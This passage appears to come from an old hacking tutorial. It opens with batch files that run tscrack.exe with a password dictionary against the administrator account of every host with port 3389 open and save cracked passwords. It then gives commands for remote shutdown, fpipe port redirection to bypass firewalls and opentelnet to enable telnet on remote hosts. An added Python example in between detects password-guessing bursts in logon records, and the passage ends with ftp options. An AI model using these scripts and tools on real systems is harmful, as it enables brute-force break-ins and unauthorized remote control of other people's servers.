@echo 3389.txt not found or scan failed
(1. Save as 3389.bat.) (Assumes that superscan or another scanner has already produced a list file 3389.txt of hosts with port 3389 open.)
3389.bat means: take an IP from the file 3389.txt, then run hack.bat on it.
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >> rouji.txt
:noscan
@echo tscrack.exe not found or scan failed
(2. Save as hack.bat.) (Run 3389.bat, with 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory, then wait for the result.)
hack.bat means: run tscrack.exe with the dictionary to crack the administrator password of every host in 3389.txt and save the cracked results in the file rouji.txt.
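From the defender's side, a dictionary run like the one the batch files above describe shows up as a burst of failed logons for one account from one source, sometimes followed by a success. The Python example below is added here and is not from the original page: it applies a sliding-window failure count per (source, user) pair and reports both the sources that exceed the threshold and the pairs where a success followed such a burst. The audit records are constructed in a simplified "timestamp user source result" form, not real Windows event-log output, and the threshold and window values are assumptions.

```python
# Added example (not from the original page): detect a password-guessing burst
# of the kind the tscrack batch above would cause, from logon audit records.
# The records are constructed in a simplified "timestamp user source result"
# form, not real Windows event-log output; a collector would produce them from
# the real audit source. Threshold and window are assumptions.
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
2003-08-12T10:00:01 administrator 192.168.0.77 FAIL
2003-08-12T10:00:02 administrator 192.168.0.77 FAIL
2003-08-12T10:00:03 administrator 192.168.0.77 FAIL
2003-08-12T10:00:05 administrator 192.168.0.77 FAIL
2003-08-12T10:00:06 administrator 192.168.0.77 FAIL
2003-08-12T10:00:08 administrator 192.168.0.77 SUCCESS
2003-08-12T10:00:30 alice 192.168.0.12 FAIL
2003-08-12T10:00:45 alice 192.168.0.12 SUCCESS
"""


def parse_events(text):
    """Return (timestamp, user, source, result) tuples, sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, src, result = line.split()
        events.append((datetime.fromisoformat(ts), user.lower(), src, result))
    return sorted(events)


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failures per (source, user).
    Returns the set of sources that reached `threshold` failures inside
    `window`, and the (source, user) pairs where a success followed such a
    burst, which is the case worth treating as a likely guessed password."""
    recent = defaultdict(deque)
    flagged, success_after_burst = set(), []
    for ts, user, src, result in events:
        q = recent[(src, user)]
        while q and ts - q[0] > window:
            q.popleft()                     # drop failures older than the window
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold:
                flagged.add(src)
        elif result == "SUCCESS" and len(q) >= threshold:
            success_after_burst.append((src, user))
    return flagged, success_after_burst


if __name__ == "__main__":
    flagged, hits = detect_bursts(parse_events(SAMPLE_EVENTS))
    print("sources exceeding threshold:", sorted(flagged))
    print("success after burst:", hits)
```

Keying the window on the (source, user) pair rather than the source alone keeps one user's repeated typos from being counted against an unrelated account; the success-after-burst list is the one that justifies a password reset and a session review rather than just a block.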
5. Others:
shutdown.exe
shutdown \\IP /t:20    shuts down the remote NT host automatically after 20 seconds (a built-in tool of the Windows 2003 system; on Windows 2000 the tool must be downloaded to use it. It is described in detail in the Windows 2003 DOS commands section above.)
fpipe.exe (TCP port redirection tool), described in detail in the second article (port redirection to bypass firewalls)
fpipe -l 80 -s 1029 -r www.sina.com.cn    when someone scans your port 80, the result they get is entirely the host information of www.sina.com.cn
fpipe -l 23 -s 88 -r 23 destinationIP    a telnet request sent from the local machine to port 23 of the destination IP is redirected through port 88 and then sent to port 23 of the destination IP. (When establishing the telnet connection with the destination IP, the local machine connects through port 88; then a plain telnet 127.0.0.1 (the local IP) connects to port 23 of the destination IP.)
opentelnet.exe (remote telnet-enabling tool)
opentelnet.exe \\IP account password NTLMauthmode telnetport    directly enables the remote host's telnet service (no upload is required; ntlm.exe defeats Microsoft's authentication method); afterwards telnet \\ip connects to the remote host.
NTLM authentication modes: 0: do not use NTLM authentication; 1: try NTLM authentication first, and if it fails, fall back to the user name and password; 2: use only NTLM authentication.
resumetelnet.exe (another tool shipped with opentelnet)
resumetelnet.exe \\IP account password    after the telnet connection to the remote host, this command restores the remote host's telnet settings and also turns the telnet service off.
6. FTP commands in detail:
The ftp command is one of the commands Internet users use most often. Being familiar with ftp's internal commands and applying them flexibly makes things much easier for the user and gets twice the result for half the effort. If you want to learn to use ftp from the command line, you must learn the ftp commands.
The command-line format of ftp is:
ftp -v -d -i -n -g [hostname], where
-v displays all response information from the remote server;
-n disables ftp's automatic login, that is, the .netrc file is not used;
-d uses debug mode;
-g disables filename globbing